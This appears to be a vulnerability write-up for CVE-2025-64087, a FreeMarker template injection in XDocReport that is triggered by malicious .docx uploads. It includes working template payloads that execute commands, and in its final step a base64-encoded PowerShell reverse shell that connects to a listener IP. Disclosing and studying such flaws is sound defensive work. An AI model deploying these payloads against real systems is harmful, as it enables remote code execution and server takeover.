
CVE-2025-64087 (SSTI)
Overview of the vulnerability
Server-Side Template Injection (SSTI) is a web security vulnerability that allows attackers to inject malicious code into templates used by content management systems (CMS) and web frameworks, enabling remote attacks, extraction of sensitive information, or system intrusion activities.
SSTI is a variant of Injection vulnerabilities (such as SQL Injection, XSS, etc.), where attackers exploit the use of template systems to deploy remote malicious code. When an SSTI attack is successfully executed, attackers can run their own code on the server side, allowing them to perform remote attacks, such as gathering sensitive information, conducting system intrusion activities, and accessing unauthorized resources.
SSTI vulnerabilities often occur due to the use of unsafe template systems, or due to failure to validate and process input parameters before inserting them into templates. If an SSTI attack is successfully carried out, the consequences can be severe and cause significant damage to the targeted organization.
Business impact
The SSTI vulnerability can lead to several serious consequences, including:
Remote Code Execution: Attackers can exploit this vulnerability to execute malicious code on the server, enabling data theft, performing illegal actions on the system, or even taking full control of the server.
Exposure of sensitive information: SSTI can allow attackers to read, modify, or delete files on the server. If these files contain sensitive information, such as accounts and passwords, the attacker can easily disclose this information.
User intimidation or phishing attacks: Attackers can use SSTI to conduct intimidation or phishing attacks by altering website content or adding fake custom buttons. If users click on these buttons, attackers can steal user information or install malware on their computers.
A Server-Side Template Injection (SSTI) vulnerability was found in OpenSAGRES XDocReport when processing DOCX templates with the FreeMarker engine. Under certain configurations, crafted templates can lead to Remote Code Execution (RCE).
The personnel management website allows users to upload .docx documents to the system. During processing, the application uses the FreeMarker template engine (in the file FreemarkerTemplateEngine.java) to render the content ${"freemarker.template.utility.Execute"?new()("whoami")} without any input content validation or filtering mechanism.
This vulnerability allows an attacker to inject malicious expressions into the .docx file (template), leading to Remote Code Execution (RCE) on the server, which can be exploited to steal information or take control of the system.
fr.opensagres.xdocreport.template.freemarker β XDocReport (versions 1.0.0 through 2.1.0).
https://github.com/opensagres/xdocreport/blob/master/template/fr.opensagres.xdocreport.template.freemarker/src/main/java/fr/opensagres/xdocreport/template/freemarker/FreemarkerTemplateEngine.java, there is no validation of the input xdoc file content. The template content is loaded directly and passed to process(context, writer, template) to be handled by the FreeMarker engine without any sandboxing or restriction mechanisms for directives/expressions. As a result, an attacker can provide a template containing malicious FreeMarker expressions/commands, leading to Remote Code Execution (RCE)..docx file containing the following payload:```
${"freemarker.template.utility.Execute"?new()("calc")}
2. See that the execution is successful and the calc application opens

3. Similarly, to get the information of the user running on the system with the payload:```
${"freemarker.template.utility.Execute"?new()("whoami")}
.docx file, after processing by the template engine, has returned system data


6. Elevate impact to RCE
- Listening machine is wsl with IP address `172.26.208.130`

- Exploit with the following payload:
```java
${"freemarker.template.utility.Execute"?new()("powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA3ADIALgAyADYALgAyADAAOAAuADEAMwAwACIALAA5ADkAOQA5ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==")}
.docx file to xdocreport for processing